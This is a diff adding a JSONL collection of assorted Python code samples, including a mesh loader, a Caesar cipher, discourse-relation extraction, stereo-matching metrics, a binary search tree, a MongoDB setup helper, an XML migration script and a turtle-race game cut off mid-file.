diff --git "a/4067.jsonl" "b/4067.jsonl"
new file mode 100644
--- /dev/null
+++ "b/4067.jsonl"
@@ -0,0 +1,663 @@
+{"seq_id":"186720677","text":"# -*- coding: utf-8 -*-\nimport numpy as np\n\n\nclass Model:\n    def __init__(self, filename):\n        vertices = []\n        faces = []\n        texcoords = []\n        texfaces = []\n        with open(filename) as fp:\n            for line in fp:\n                if line.startswith('#'):\n                    continue\n                values = line.split()\n                if not values:\n                    continue\n                if values[0] == 'v':\n                    v = [float(val) for val in values[1:]]\n                    vertices.append(v)\n                elif values[0] == 'vt':\n                    vt = [float(values[1]), float(values[2])]\n                    texcoords.append(vt)\n                elif values[0] == 'f':\n                    face = []\n                    texface = []\n                    for v in values[1:]:\n                        w = v.split('/')\n                        face.append(int(w[0])-1)\n                        texface.append(int(w[1])-1)\n                    faces.append(face)\n                    texfaces.append(texface)\n\n        print(\"\\nObj file read:\\n\", \"-\" * 29, sep='')\n        print(\"#v\", \"#f\", \"#vt\", \"#ft\", sep='\\t\\t')\n        print(len(vertices), len(faces), len(texcoords), len(texfaces), sep='\\t')\n        print(\"-\" * 29 + '\\n')\n\n        self.vertices = np.array(vertices)\n        self.faces = np.array(faces, dtype=np.uint32)\n        self.texcoords = np.array(texcoords)\n        self.texfaces = np.array(texfaces, dtype=np.uint32)\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
+{"seq_id":"589110834","text":"from setuptools import find_packages\nfrom setuptools import setup\nimport os\n\nVERSION='0.0.4'\n\n\nsetup(\n    description='Plone.org theme',\n    entry_points={\n        'z3c.autoinclude.plugin': 'target = plone', \n    },\n    include_package_data=True,\n    install_requires=[\n        'setuptools',\n    ],\n    long_description=(\n        open('README.rst').read() +\n        open(os.path.join('docs', 'HISTORY.txt')).read()\n    ),\n    name='plonetheme.ploneorg',\n    namespace_packages=[\n        'plonetheme',\n    ],\n    packages=find_packages(),\n    version=VERSION,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
+{"seq_id":"91665283","text":"alpha = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\r\nalphaUp = 'АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ'\r\nnumber = int(input('Введите число Цезяря: '))\r\nsummary = ''\r\n\r\ndef changeChar(char):\r\n    if char in alpha:\r\n        return alpha[(alpha.index(char) + number) % len(alpha)]\r\n    elif char in alphaUp:\r\n        return alphaUp[(alphaUp.index(char) + number) % len(alphaUp)]\r\n    else:\r\n        return char\r\n\r\nwith open('filename.txt', encoding='utf8') as myFile:\r\n    for line in myFile:\r\n        for char in line:\r\n            summary += changeChar(char)\r\n\r\nwith open('output.txt', 'w', encoding='utf8') as myFile:\r\n    myFile.write(summary)\r\n","sub_path":"Шифр Цезаря.py","file_name":"Шифр Цезаря.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
+{"seq_id":"609369706","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\nimport sys\r\n# reload(sys)\r\n# sys.setdefaultencoding(\"utf-8\")\r\n\r\nimport os \r\nimport codecs\r\nfrom operator import itemgetter\r\n\r\nimport folderWalk as fw\r\n\r\nclass discourseRelation() :\r\n    ''' Discourse Relation class. This class includes all the components of a discourse relation. \r\n    '''\r\n\r\n    def __init__(self, relationType , connSpan , arg1Span , arg2Span , sense) :\r\n        ''' Takes Type of the Relation, connective Span, Argument Spans and Sense as input '''\r\n        self.relationType = relationType\r\n        self.connSpan = connSpan\r\n        self.arg1Span = arg1Span\r\n        self.arg2Span = arg2Span\r\n        self.sense = sense\r\n        self.arg1 = None\r\n        self.arg2 = None\r\n        self.conn = None\r\n        self.isPaired = False\r\n        self.connTrees = []\r\n        self.arg1Trees = []\r\n        self.arg2Trees = []\r\n        self.arg1Sentence = []\r\n        self.arg2Sentence = []\r\n        self.fileName = None\r\n    \r\n    def updateSense(self , sense) :\r\n        ''' Update the sense field '''\r\n        self.sense = sense\r\n    \r\n    def updateArg1Span(self , arg1Span) :\r\n        ''' Update the span value for Argument-1 '''\r\n        self.arg1Span = arg1Span\r\n    \r\n    def updateArg2Span(self , arg2Span) :\r\n        ''' Update the span value for Argument-2 '''\r\n        self.arg2Span = arg2Span\r\n    \r\n    def updateRelationType(self , relationType) :\r\n        ''' Update the type of the discourse relation '''\r\n        self.relationType = relationType\r\n\r\n    def populateRelationText(self,data) :\r\n        ''' Takes Raw Text as data and populates the argument-texts from the already stored span values ''' \r\n        self.conn = ''\r\n        if self.relationType in ['Explicit', 'AltLex'] :\r\n            self.conn = seekPrint(data,self.connSpan)\r\n        self.arg1 = seekPrint(data,self.arg1Span)\r\n        self.arg2 = seekPrint(data,self.arg2Span)\r\n        return 1\r\n\r\n    def printValue(self) : \r\n        ''' Prints the disourse relation with text and tree(s) in the arguments and connective '''\r\n        returnString = ''\r\n        returnString += 'ARG1 : ' + self.arg1 + '\\n'\r\n        returnString += '\\n'.join(tree.printValue(tree.rootNode) for tree in self.arg1Trees)\r\n        returnString += 'ARG2 : ' + self.arg2 + '\\n'\r\n        returnString += '\\n'.join(tree.printValue(tree.rootNode) for tree in self.arg2Trees)\r\n        returnString += 'CONN : ' + self.conn + '\\n'\r\n        returnString += '\\n'.join(tree.printValue(tree.rootNode) for tree in self.connTrees)\r\n        returnString += '\\n-----------\\n'\r\n        return returnString\r\n\r\n\r\ndef seekPrint(data,pos) :\r\n    ''' Given Text and PDTB-style offset format, extracts the desired text '''\r\n    returnString=''\r\n    posList=pos.split(';')\r\n    delimiter = ''\r\n    for posPart in posList :\r\n        [posInit,posFinal]=posPart.split('..')\r\n        returnString = returnString + delimiter + data[int(posInit):int(posFinal)]\r\n        if len(posList) > 1 :\r\n            delimiter = '..'\r\n    return returnString\r\n\r\n\r\ndef getPOSList(span) :\r\n    ''' Given the PDTB-style offset format, extracts the different discontiguous offset mentions and returns a list of tuple(startPOS,endPOS) for each part ''' \r\n    POSList = []\r\n    spanList = span.split(';')\r\n    for spanPart in spanList :\r\n        [startPOS ,endPOS] = spanPart.split('..')\r\n        POSList.append((int(startPOS) , int(endPOS)))\r\n    return POSList\r\n\r\ndef updateSenseIndex(index, conn , sense) :\r\n    ''' Update a 2-level dictionary \"index\" for a particular sense and connective '''\r\n    if conn not in index.keys() :\r\n        index[conn] = {}\r\n        index[conn][sense] = 1\r\n    else :\r\n        if sense not in index[conn].keys() :\r\n            index[conn][sense] = 1\r\n        else :\r\n            index[conn][sense] += 1\r\n    return index\r\n\r\ndef analyseRelation(relation,data) :\r\n    ''' Checks the relation for particular characteristics such as adjacency, sentence difference etc. \r\n    '''\r\n\r\n    if relation.connSpan!='' :\r\n        return isBetween(relation.connSpan , relation.arg1Span , relation.arg2Span) \r\n\r\ndef processAnnFile( relationList , connTypeCounts , explicitConnDict, implicitConnDict , altlexConnDict, senseDict , connSenseIndex ,annFD,rawFD,type='full') :\r\n    print(\"Processing annotation file:\", annFD.name)\r\n    ''' Given the annotation file and raw file descriptor, process the ann file and populate the discourse relations '''\r\n\r\n# connTypeCounts = {'Explicit':0 , 'Implicit':0 ,'AltLex':0 , 'EntRel':0 , 'NoRel':0}\r\n# connTypeCounts = [0,0,0,0,0]\r\n# senseDict = {}\r\n# explicitConnDict = {}\r\n# altlexConnDict = {}\r\n# implicitConnDict = {}\r\n# connSenseIndex = {}\r\n\r\n    temp = rawFD.read()\r\n# relationList = []\r\n    for line in annFD :\r\n        fields=line.split('|')\r\n        tempDR = discourseRelation(fields[0], fields[1],fields[14],fields[20] , fields[8])\r\n        tempDR.fileName = rawFD.name\r\n\r\n        if tempDR.sense == '' :\r\n            tempDR.sense = '_Without_sense'\r\n        \r\n        if type=='full' : \r\n\r\n            connTypeCounts[tempDR.relationType] += 1\r\n            senseDict[tempDR.sense] = senseDict.setdefault(tempDR.sense,0) + 1\r\n\r\n            if tempDR.relationType=='Explicit' :\r\n                tempDR.conn = seekPrint(temp,tempDR.connSpan)\r\n                explicitConnDict[tempDR.conn] = explicitConnDict.setdefault(tempDR.conn,0) + 1\r\n                index = updateSenseIndex(connSenseIndex, tempDR.conn , tempDR.sense)\r\n\r\n            elif tempDR.relationType=='AltLex' :\r\n                tempDR.conn = seekPrint(temp,tempDR.connSpan)\r\n                altlexConnDict[tempDR.conn] = altlexConnDict.setdefault(tempDR.conn , 0) + 1\r\n\r\n            elif tempDR.relationType=='Implicit' :\r\n                tempDR.conn = fields[7]\r\n                implicitConnDict[tempDR.conn] = implicitConnDict.setdefault(tempDR.conn , 0 ) + 1\r\n\r\n        relationList.append(tempDR)\r\n    return [relationList, connTypeCounts, [explicitConnDict , implicitConnDict , altlexConnDict] , senseDict, connSenseIndex]\r\n\r\nif __name__ == '__main__' :\r\n    CONNS = list()\r\n    # Specify the input directory as first argument\r\n    dataPath = sys.argv[1]\r\n    annPath = os.path.join(sys.argv[1],'ann')\r\n    rawPath = os.path.join(sys.argv[1],'raw')\r\n\r\n    # Specify the outputFile-prefix as second argument\r\n# outPath = sys.argv[2]\r\n# outFile = outPath + '.statistics.txt'\r\n# outRelationFile = outPath + '.relationList.txt'\r\n# adjRelationFile = outPath + '.adjRelationList.txt'\r\n\r\n    annFileDict = fw.fileListToFileNameDict(fw.folderWalk(annPath))\r\n    rawFileDict = fw.fileListToFileNameDict(fw.folderWalk(rawPath))\r\n\r\n    # outFD=codecs.open(outFile,'w',encoding='utf-8')\r\n    # outRelationFD = codecs.open(outRelationFile,'w',encoding='utf-8')\r\n    # adjRelationFD = codecs.open(adjRelationFile,'w',encoding='utf-8')\r\n\r\n    \r\n    connTypeCounts = {'Explicit':0 , 'Implicit':0 ,'AltLex':0 , 'EntRel':0 , 'NoRel':0}\r\n    senseDict = {}\r\n    explicitConnDict = {}\r\n    altlexConnDict = {}\r\n    implicitConnDict = {}\r\n    connSenseIndex = {}\r\n    relationList=[]\r\n    \r\n    for inpFile in annFileDict.keys() :\r\n        annFD = open(annFileDict[inpFile],'r')\r\n        rawFD = codecs.open(rawFileDict[inpFile],'rb',encoding='utf-8')\r\n        # outRelationFD.write(annFD.name + '\\n')\r\n        [relationList , connTypeCounts, [explicitConnDict , implicitConnDict , altlexConnDict] , senseDict, connSenseIndex ] = processAnnFile( relationList , connTypeCounts , explicitConnDict, implicitConnDict , altlexConnDict, senseDict , connSenseIndex ,annFD , rawFD)\r\n        annFD.close()\r\n    \r\n    G = list()\r\n    for dr in relationList:\r\n        if dr.relationType == 'Explicit' and dr.conn in CONNS:\r\n            G.append((dr.arg1Sentence, dr.arg2Sentence, dr.conn))\r\n\r\n\r\n\r\n    # Producing the statistics File \r\n\r\n# outFD.write('Total Connective Frequency :\\n')\r\n# outFD.write( 'Explicit Connectives\\t%d\\nImplicit Connectives\\t%d\\nAltLex\\t%d\\nEntRel\\t%d\\nNoRel\\t%d\\n\\n' % (connTypeCounts['Explicit'] , connTypeCounts['Implicit'] , connTypeCounts['AltLex'] , connTypeCounts['EntRel'] , connTypeCounts['NoRel']))\r\n# outFD.write('Sense Frequency :\\n')\r\n# senseList = sorted(senseDict.items() , key=itemgetter(0))\r\n# outFD.write('\\n'.join(x[0] + '\\t' + str(x[1]) for x in senseList) + '\\n')\r\n# outFD.write('\\nExplicit Connective Frequency :\\n')\r\n\r\n# for conn in explicitConnDict.keys() :\r\n# outFD.write(conn + '\\t' + str(explicitConnDict[conn]) + '\\n')\r\n# outFD.write('\\nAltLex Connective Frequency :\\n')\r\n# for conn in altlexConnDict.keys() :\r\n# outFD.write(conn + '\\t' + str(altlexConnDict[conn]) + '\\n')\r\n# outFD.write('\\nImplicit Connective Frequency :\\n')\r\n# for conn in implicitConnDict.keys() :\r\n# outFD.write(conn + '\\t' + str(implicitConnDict[conn]) + '\\n')\r\n\r\n    # Producing the Connective-Sense Mapping Statistics File\r\n\r\n    # connSenseFD = codecs.open(outPath + '.mappings.txt' , 'w' , encoding = 'utf-8')\r\n    # connMappings = sorted(connSenseIndex.items() , key=itemgetter(1) , reverse=True)\r\n    # for conn in connMappings :\r\n    # connective = conn[0]\r\n    # senses = sorted(conn[1].items() , key=itemgetter(0) , reverse=True)\r\n    # connSenseFD.write('Connective : ' + connective + '\\n' + 'Types of Sense : ' + str(len(senses)) + '\\n' + '\\n'.join(('Sense : ' + x[0] + ' - ' + str(x[1])) for x in senses) + '\\n\\n')\r\n    \r\n    import editdistance\r\n\r\n    S = list()\r\n\r\n    for conn in CONNS:\r\n        total = 0\r\n        count = 0\r\n        for s1, s2, sc in S:\r\n            if sc != conn:\r\n                continue\r\n            for g1, g2, gc in G:\r\n                if gc != conn:\r\n                    continue\r\n                d1 = editdistance.eval(s1, g1) / max(len(s1), len(g1))\r\n                d2 = editdistance.eval(s2, g2) / max(len(s2), len(g2))\r\n                if min(d1, d2) < 0.7:\r\n                    total += d1 + d2 \r\n                    count += 1\r\n        \r\n        print(\"Average extraction error for \" + conn + \"=\", total / count)","sub_path":"HDTB/extract_relations.py","file_name":"extract_relations.py","file_ext":"py","file_size_in_byte":10273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
+{"seq_id":"12917980","text":"\n\n#calss header\nclass _MAINSPRING():\n\tdef __init__(self,): \n\t\tself.name = \"MAINSPRING\"\n\t\tself.definitions = [u'the most important reason for something; the thing that makes something else happen: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_mainspring.py","file_name":"_mainspring.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
+{"seq_id":"576601461","text":"\n\nfrom xai.brain.wordbase.verbs._impair import _IMPAIR\n\n#calss header\nclass _IMPAIRING(_IMPAIR, ):\n\tdef __init__(self,): \n\t\t_IMPAIR.__init__(self)\n\t\tself.name = \"IMPAIRING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"impair\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_impairing.py","file_name":"_impairing.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
+{"seq_id":"348168551","text":"from PIL import Image\nimport math\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\nimport os\nimport numpy as np\nfrom file_utilities import list_directories, write_report\nimport imutils\nimport cv2\nfrom tqdm import tqdm\nfrom utils import *\nfrom CV_stereo_matching.opencv_stereo_matching import StereoMatching\n\n\"\"\"\n data_path --> dir of the dataset\n The folders inside have to be the following structure tree\n main dir\n |--- asw_estimation : disparity estimation\n |--- disp_up: GT disparity\n |--- depth_up: GT depth map\n |--- image_up\n |--- imag_down\n\"\"\"\nreport_name = \"MP3D_StereoMatching_disp_range.csv\"\ndata_path_gt = \"/home/kike/Documents/Dataset/ICCV_dataset/MP3D/test\"\n\n# report_name = \"SF3D_StereoMatching_disp_range.csv\"\n# data_path_gt = \"/home/kike/Documents/Dataset/ICCV_dataset/SF3D/test\"\n\n\ndir_disp_gt = os.path.join(data_path_gt, \"disp_up\")\ndir_depth_gt = os.path.join(data_path_gt, \"depth_up\")\ndir_rgb_map_up = os.path.join(data_path_gt, \"image_up\")\ndir_rgb_map_down = os.path.join(data_path_gt, \"image_down\")\n\nlist_disp_gt = list_directories(dir_disp_gt)\nlist_depth_gt = list_directories(dir_depth_gt)\nlist_rgb_map_up = list_directories(dir_rgb_map_up)\nlist_rgb_map_down = list_directories(dir_rgb_map_down)\n\nglobal_disp_range_1 = 0\nglobal_disp_range_2 = 0\nglobal_disp_range_3 = 0\n\nreport = []\nstereo = StereoMatching()\n\ntbar = tqdm(total=len(list_disp_gt))\nfor i in range(len(list_disp_gt)):\n disp_gt = np.load(os.path.join(dir_disp_gt, list_disp_gt[i]))\n\n mask_range = disp_gt > 67.5\n disp_gt[mask_range] = 0\n\n rgb_map_up = cv2.imread(os.path.join(dir_rgb_map_up, list_rgb_map_up[i]))\n rgb_map_down = cv2.imread(os.path.join(dir_rgb_map_down, list_rgb_map_down[i]))\n\n imgL = imutils.rotate_bound(rgb_map_up, 270)\n imgR = imutils.rotate_bound(rgb_map_down, 270)\n disp_est = stereo.run(imgL, imgR) * 180 / 512\n disp_est = imutils.rotate_bound(disp_est, 90)\n\n mask = disp_gt > 0\n disp_est[(mask * (-1) + 1).astype(np.bool)] = 0\n disp_gt[(mask * (-1) + 1).astype(np.bool)] = 0\n\n disp_error = np.abs(disp_gt - disp_est)\n\n disp_range_1 = disp_error >= 0.1\n disp_range_2 = disp_error >= 0.5\n disp_range_3 = disp_error >= 1\n\n global_disp_range_1 += np.count_nonzero(disp_range_1) / (disp_range_1.size)\n global_disp_range_2 += np.count_nonzero(disp_range_2) / (disp_range_2.size)\n global_disp_range_3 += np.count_nonzero(disp_range_3) / (disp_range_3.size)\n\n tbar.update(1)\n\n line = [i, list_disp_gt[i], np.count_nonzero(disp_range_1) / (disp_range_1.size),\n np.count_nonzero(disp_range_2) / (disp_range_2.size),\n np.count_nonzero(disp_range_3) / (disp_range_3.size)]\n write_report(report_name, line)\n\ntbar.close()\n\ntotal_dis_error_range_1 = global_disp_range_1 / len(list_disp_gt)\ntotal_dis_error_range_2 = global_disp_range_2 / len(list_disp_gt)\ntotal_dis_error_range_3 = global_disp_range_3 / len(list_disp_gt)\n\nwrite_report(report_name, [report_name])\nwrite_report(report_name, [\"disp >0.1:\", total_dis_error_range_1])\nwrite_report(report_name, [\"disp >0.5: \", total_dis_error_range_2])\nwrite_report(report_name, [\"disp >1: \", total_dis_error_range_3])\n","sub_path":"StereoMatching/metrics_disparity_errors.py","file_name":"metrics_disparity_errors.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"129887697","text":"from queue import Queue\n\nclass BinarySearchTree:\n def 
__init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n def depth_first_for_each(self, cb): # O(n)\n \n \"\"\"\n The basic algorithm of Pre-order traversal is to visit the root, traverse the left subtree, then traverse the right subtree.\n Here, we're going to check the left or right, and recursively call the depth_first method, while passing in cb.\n cb is the closure (lambda in Python) that will hold on to the value so it can be used in the test file.\n \"\"\"\n \n # Calling the callback with the current parent\n cb(self.value)\n \n # Traverse the left side\n if self.left is not None:\n self.left.depth_first_for_each(cb)\n \n if self.right is not None:\n self.right.depth_first_for_each(cb)\n \n\n \"\"\"\n Stretch goal\n \n The breadth first search is best implemented using Queue data structure, so I implemented the Queue method in another file and then use it here. In addition, I implemented the Linked List method because Queue uses Linked List in its code.\n Here, we're going to add to the queue, then use a loop to check the situation.\n We're going to store the dequeued item in current_node and check if it's empty or not. If it's empty then it means the queue is empty. If it's not empty, then we're going to hold the its value in a closure (lambda) so it can be used in the test file.\n Then we check if the current_node has any children; if it does, then we add them to the queue.\n \"\"\"\n def breadth_first_for_each(self, cb): # O(n)\n \n queue = Queue()\t# O(1)\n \n queue.enqueue(self)\t# adding self, root\t# O(1)\n \n while True: # O(n)\n \n current_node = queue.dequeue()\t# O(1)\n \n if current_node is None:\n return\n \n cb(current_node.value)\t# O(1)\n \n if current_node.left is not None:\n queue.enqueue(current_node.left)\t# O(1)\n if current_node.right is not None:\n queue.enqueue(current_node.right)\t# O(1)\n\n\n def insert(self, value):\n new_tree = BinarySearchTree(value)\n if (value < self.value):\n if not self.left:\n self.left = new_tree\n else:\n self.left.insert(value)\n elif value >= self.value:\n if not self.right:\n self.right = new_tree\n else:\n self.right.insert(value)\n\n def contains(self, target):\n if self.value == target:\n return True\n if self.left:\n if self.left.contains(target):\n return True\n if self.right:\n if self.right.contains(target):\n return True\n return False\n\n def get_max(self):\n if not self:\n return None\n max_value = self.value\n current = self\n while current:\n if current.value > max_value:\n max_value = current.value\n current = current.right\n return max_value\n","sub_path":"search/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"532039789","text":"# Day 12\n\nclass Solution(object):\n def combinationSum3(self, k, n):\n \"\"\"\n :type k: int\n :type n: int\n :rtype: List[List[int]]\n \"\"\"\n result = []\n \n def backtrack(combination, remaining, start):\n if len(combination) == k and remaining == 0:\n print(combination)\n result.append(combination[:])\n return\n \n elif remaining < 0 or len(combination) > k:\n return\n \n for i in range(start+1, 10):\n combination.append(i)\n backtrack(combination, remaining - i , i)\n combination.pop()\n \n backtrack([], n, 0)\n \n return 
result\n","sub_path":"combinationSum3.py","file_name":"combinationSum3.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"569523556","text":"import pymongo\nfrom pymongo.errors import CollectionInvalid\n\nclient = pymongo.MongoClient(\"mongodb://localhost:27017\")\n\n\ndef setup_db(db_name, collection_name):\n if db_name in client.list_database_names():\n print('Database: {} already present'.format(db_name))\n db = client['db_name']\n try:\n db.create_collection(collection_name)\n except CollectionInvalid:\n print('Collection: {} already exists'.format(collection_name))\n else:\n db = client[db_name]\n db.create_collection(collection_name)","sub_path":"app/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"618721154","text":"import csv\nfrom _elementtree import Element\n\nimport os\nimport re\nimport sys\nfrom lxml import etree\n#Remove all the unwanted Elements and Transport\n\n\n\ndef removeTrans(trans,partyname):\n\n mftxpath = [\"/IPNET/GatewayGroup\", \"/IPNET/AgentTypeGroup\",\"/IPNET/PasswordPolicyGroup\",\"/IPNET/CertificateGroup\",\"/IPNET/RoleGroup\",\"/IPNET/NameSpaceGroup\",\"/IPNET/ViewGroup\",\"/IPNET/AlertGroup\",\"/IPNET/UserGroup\",\"/IPNET/DocTypeGroup\",\"/IPNET/ReportGroup\",\"/IPNET/SystemVMGroup\"]\n for dmftxpath in mftxpath:\n for dxpath in transrulesfile.xpath(dmftxpath):\n dxpath.getparent().remove(dxpath)\n\n for tlcpx in transrulesfile.xpath(\"/IPNET/CPXGroup/TopLevelCPX\"):\n if (tlcpx.get('party_name')!= partyname):\n tlcpx.getparent().remove(tlcpx)\n for transport in transrulesfile.xpath(\"/IPNET/CPXGroup/TopLevelCPX/TransportInfo/TransportInfoObject[@name!='\"+trans+ \"']\"):\n transport.getparent().remove(transport)\n\n for party in transrulesfile.xpath(\"/IPNET/PartyGroup/TopLevelParty[@name!='\"+partyname+ \"']\"):\n party.getparent().remove(party)\n\n\n#Remove all the unwanted Rules\ndef removeRules(rule):\n for record in transrulesfile.xpath(\"//Rule[@name!='\"+rule+ \"']\"):\n record.getparent().remove(record)\n\n#Remove all the unwanted Services\ndef removeService(service):\n mftxpath = [\"/IPNET/GatewayGroup\", \"/IPNET/AgentTypeGroup\",\"/IPNET/PasswordPolicyGroup\",\"/IPNET/CertificateGroup\",\"/IPNET/RoleGroup\",\"/IPNET/NameSpaceGroup\",\"/IPNET/ViewGroup\",\"/IPNET/AlertGroup\",\"/IPNET/UserGroup\",\"/IPNET/DocTypeGroup\",\"/IPNET/ReportGroup\",\"/IPNET/SystemVMGroup\",\"/IPNET/PartyGroup\",\"/IPNET/CPXGroup/TopLevelCPX/RulesetInfo\"]\n for dmftxpath in mftxpath:\n for dxpath in servicefile.xpath(dmftxpath):\n dxpath.getparent().remove(dxpath)\n for tlcpx in servicefile.xpath(\"/IPNET/CPXGroup/TopLevelCPX\"):\n if (tlcpx.get('party_name')!= \"SYSTEM\"):\n tlcpx.getparent().remove(tlcpx)\n for ser in servicefile.xpath(\"/IPNET/CPXGroup/TopLevelCPX/TransportInfo/TransportInfoObject[@name!='\"+service+ \"']\"):\n ser.getparent().remove(ser)\n\n#Remove all the unwanted Doc Type\ndef removeDoctype(doctype):\n mftxpath = [\"/IPNET/GatewayGroup\", \"/IPNET/AgentTypeGroup\",\"/IPNET/PasswordPolicyGroup\",\"/IPNET/CertificateGroup\",\"/IPNET/RoleGroup\",\"/IPNET/NameSpaceGroup\",\"/IPNET/ViewGroup\",\"/IPNET/AlertGroup\",\"/IPNET/UserGroup\",\"/IPNET/CPXGroup\",\"/IPNET/ReportGroup\",\"/IPNET/SystemVMGroup\",\"/IPNET/PartyGroup\",\"/IPNET/CPXGroup/TopLevelCPX/RulesetInfo\"]\n for dmftxpath in mftxpath:\n for dxpath in 
docfile.xpath(dmftxpath):\n dxpath.getparent().remove(dxpath)\n for doct in docfile.xpath(\"/IPNET/DocTypeGroup/TopLevelDocType[@name!='\"+doctype+ \"']\"):\n doct.getparent().remove(doct)\n\n#Update Transport values\ndef updateTrans(hostname,loginid,path,filemask):\n ServerName= transrulesfile.xpath(\".//ServerName\")\n login=transrulesfile.xpath(\".//Name\")\n dirpath=transrulesfile.xpath(\".//Path\")\n mask=transrulesfile.xpath(\".//FileSpec\")\n\n if(hostname!=''):\n for sname in ServerName:\n sname.text= hostname\n if(loginid!=''):\n for lid in login:\n lid.text=loginid\n if(path!=''):\n for dpath in dirpath:\n dpath.text=path\n if(filemask!=''):\n for fmask in mask:\n fmask.text=filemask\n\n#Update Service values\ndef updateService(servicename,hostname,loginid,path,filemask):\n ServerName= servicefile.xpath(\".//ServerName\")\n login=servicefile.xpath(\".//Name\")\n dirpath=servicefile.xpath(\".//Path\")\n mask=servicefile.xpath(\".//FileSpec\")\n if(hostname!=''):\n for sname in ServerName:\n sname.text= hostname\n #sname.append(Element('D', {'name': 'error'}))\n if(loginid!=''):\n for lid in login:\n lid.text=loginid\n if(path!=''):\n for dpath in dirpath:\n dpath.text=path\n if(filemask!=''):\n for fmask in mask:\n fmask.text=filemask\n\n\n#Read the Dev config data\nconfdata=sys.argv[1]\nmatch = re.search(\"(.+)/(.+).xml\", confdata)\nif match:\n match = re.search(\"(.+)/(.+).xml\", confdata)\nelse:\n match = re.search(\"(.+)\\\\\\(.+).xml\", confdata)\ntransrulesfile = etree.parse(confdata)\nservicefile= etree.parse(confdata)\ndocfile=etree.parse(confdata)\n\n#Read Parm file\nparmfile=sys.argv[2]\ncsvparmfile = open(parmfile)\ncsv_f = csv.reader(csvparmfile)\nnext(csv_f, None)\nfor row in csv_f:\n if (row[0]!='') :\n removeTrans(row[1],row[0])\n if (row[1]!='') :\n removeRules(row[2])\n if (row[7]!='') :\n removeService(row[7])\n if (row[12]!='') :\n removeDoctype(row[12])\n updateTrans(row[3],row[4],row[5],row[6])\n updateService(row[7],row[8],row[9],row[10],row[11])\n #Write the updated config file\n if not os.path.exists(match.group(1)+\"//\"+row[7]):\n os.makedirs(match.group(1)+\"//\"+row[7])\n filepath = match.group(1)+\"//\"+row[7]+\"//\"\n\n f = open(filepath+row[7]+\"_Trans_Rules.xml\", 'wb+')\n f.write(etree.tostring(transrulesfile, pretty_print=True))\n f = open(filepath+row[7]+\"_Service.xml\", 'wb+')\n f.write(etree.tostring(servicefile, pretty_print=True))\n if (row[12]!='') :\n f = open(filepath+row[7]+\"_Doctype.xml\", 'wb+')\n f.write(etree.tostring(docfile, pretty_print=True))\n","sub_path":"src/migration/migration.py","file_name":"migration.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"246158533","text":"# TURTLE RACE, the game\r\n\r\nfrom turtle import *\r\nfrom random import randrange\r\nfrom time import perf_counter\r\n\r\nfrom _SETTINGS_ import *\r\nfrom T_BGM import *\r\nfrom T_DrawTracks import *\r\nfrom T_AddTurtles import *\r\nfrom T_MakeMove import *\r\nfrom T_Scoreboard import *\r\n\r\n# Chọn độ dài\r\nl = -1\r\nwhile (l == -1):\r\n l = input('Choose racetrack length (1=short, 2=medium, 3=long): ')\r\n l = int(l)\r\n if (l-1 < 0) or (l-1 > 2): l = -1\r\ntrackLength_Session = trackUnitCount[l-1] * trackUnitLength\r\n\r\n# Phát nhạc nền\r\nPlayBGM()\r\n\r\n# Vẽ đường đua\r\nspeed(0.125)\r\nDrawTracks(trackUnitCount[l-1])\r\n\r\n# Tạo rùa và lấy thứ tự chạy\r\nt = []\r\nt = AddTurtles(t)\r\norder = []\r\nfor i in range(turtleCount): 
